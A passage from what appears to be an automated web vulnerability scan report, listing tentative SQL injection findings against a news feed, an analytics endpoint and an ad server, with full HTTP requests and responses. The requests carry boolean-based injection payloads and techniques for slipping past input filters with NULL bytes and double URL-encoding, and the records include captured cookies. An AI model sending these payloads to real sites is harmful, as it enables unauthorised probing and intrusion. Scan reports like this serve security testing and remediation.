Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56814002997'%20or%201%3d2--%20/200960.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:58 GMT
Content-Length: 0
Connection: close


1.110. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/203708.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/203708.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20696714'%20or%201%3d1--%20 and 20696714'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi20696714'%20or%201%3d1--%20/rss/CustomRssServlet/568/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:18 GMT
Date: Tue, 07 Dec 2010 23:19:18 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi20696714'%20or%201%3d2--%20/rss/CustomRssServlet/568/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.111. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/203708.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/203708.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:28 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:28 GMT
Content-Length: 0
Connection: close


1.112. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/210701.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/210701.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15372256'%20or%201%3d1--%20 and 15372256'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d1--%20/568/210701.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d2--%20/568/210701.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:04 GMT
Content-Length: 0
Connection: close


1.113. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/214511.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/214511.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:50 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/214511.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:50 GMT
Content-Length: 0
Connection: close


1.114. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/214511.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/214511.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:22:52 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/214511.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:22:52 GMT
Content-Length: 591
Connection: close
Set-Cookie: JSESSIONID=YLI2POOCBMFEWCUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.115. http://metrics.carpricesecrets.com/b/ss/cvencarpricesecrets/1/H.16/s75690248599275 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.carpricesecrets.com
Path:   /b/ss/cvencarpricesecrets/1/H.16/s75690248599275

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/cvencarpricesecrets%00'/1/H.16/s75690248599275?[AQB]&ndh=1&t=7/11/2010%2016%3A55%3A22%202%20360&vmt=48DA665D&ns=classifiedventures1&pageName=DLP%20-%20Make&g=http%3A//www.carpricesecrets.com/mercury%3Ft_se%3Dmsn%26t_campid%3D1295942%26t_adgpid%3D147006720%26t_adid%3D262573534%26t_keyid%3D1323580327%26t_mtype%3Dc&r=http%3A//cm.npc-medianews.overture.com/js_1_0/%3Fconfig%3D2554942840%26type%3Dmisc%26ctxtId%3Dmisc%26keywordCharEnc%3Dutf8%26source%3Dnpc_mng_sanjosemercurynews_t2_ctxt%26adwd%3D728%26adht%3D90%26ctxtUrl%3Dhttp%253A%252F%252Fwww.mercurynews.com%252F%26du%3D1%26cb%3D1291762313102%26ctxtContent%3D%253Chead%253E%253C&cc=USD&ch=/mercury&server=www.carpricesecrets.com&events=event8%2Cevent2&c1=1&v1=1&c3=2%3A30PM&c4=Tuesday&c5=Weekday&c6=New&c7=28&v7=Step1%3A%20Quote-Make%20Landing%20Page&c8=999&v11=2%3A30PM&v12=Tuesday&v13=Weekday&v14=New&v32=Paid&v35=MSN&v40=MSN&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1419&bh=892&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://www.carpricesecrets.com/mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op387homepage1gum=a02f08301726c7j09t6e489c1; op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; s_nr=1291762522620

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 00:49:33 GMT
Server: Omniture DC/2.0.0
Content-Length: 429
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/cvencarpricesecrets was not found on this serve
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/cvencarpricesecrets%00''/1/H.16/s75690248599275?[AQB]&ndh=1&t=7/11/2010%2016%3A55%3A22%202%20360&vmt=48DA665D&ns=classifiedventures1&pageName=DLP%20-%20Make&g=http%3A//www.carpricesecrets.com/mercury%3Ft_se%3Dmsn%26t_campid%3D1295942%26t_adgpid%3D147006720%26t_adid%3D262573534%26t_keyid%3D1323580327%26t_mtype%3Dc&r=http%3A//cm.npc-medianews.overture.com/js_1_0/%3Fconfig%3D2554942840%26type%3Dmisc%26ctxtId%3Dmisc%26keywordCharEnc%3Dutf8%26source%3Dnpc_mng_sanjosemercurynews_t2_ctxt%26adwd%3D728%26adht%3D90%26ctxtUrl%3Dhttp%253A%252F%252Fwww.mercurynews.com%252F%26du%3D1%26cb%3D1291762313102%26ctxtContent%3D%253Chead%253E%253C&cc=USD&ch=/mercury&server=www.carpricesecrets.com&events=event8%2Cevent2&c1=1&v1=1&c3=2%3A30PM&c4=Tuesday&c5=Weekday&c6=New&c7=28&v7=Step1%3A%20Quote-Make%20Landing%20Page&c8=999&v11=2%3A30PM&v12=Tuesday&v13=Weekday&v14=New&v32=Paid&v35=MSN&v40=MSN&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1419&bh=892&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://www.carpricesecrets.com/mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op387homepage1gum=a02f08301726c7j09t6e489c1; op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; s_nr=1291762522620

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 00:49:33 GMT
Server: Omniture DC/2.0.0
xserver: www608
Content-Length: 0
Content-Type: text/html


1.116. http://metrics.carpricesecrets.com/b/ss/cvennewscars/1/H.14/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.carpricesecrets.com
Path:   /b/ss/cvennewscars/1/H.14/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/cvennewscars/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1
Host: metrics.carpricesecrets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 01:06:06 GMT
Server: Omniture DC/2.0.0
Content-Length: 433
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/cvennewscars/1/H.14/ was not found on this s
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/cvennewscars/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1
Host: metrics.carpricesecrets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 01:06:06 GMT
Server: Omniture DC/2.0.0
xserver: www609
Content-Length: 0
Content-Type: text/html
Connection: close


1.117. http://metrics.carpricesecrets.com/b/ss/cvennewscars/1/H.14/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.carpricesecrets.com
Path:   /b/ss/cvennewscars/1/H.14/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/cvennewscars%00'/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1
Host: metrics.carpricesecrets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 01:06:09 GMT
Server: Omniture DC/2.0.0
Content-Length: 422
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/cvennewscars was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/cvennewscars%00''/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1
Host: metrics.carpricesecrets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 01:06:09 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 0
Content-Type: text/html
Connection: close


1.118. http://open.ad.yieldmanager.net/a1 [conTy2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://open.ad.yieldmanager.net
Path:   /a1

Issue detail

The conTy2 parameter appears to be vulnerable to SQL injection attacks. The payloads 13898589'%20or%201%3d1--%20 and 13898589'%20or%201%3d2--%20 were each submitted in the conTy2 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

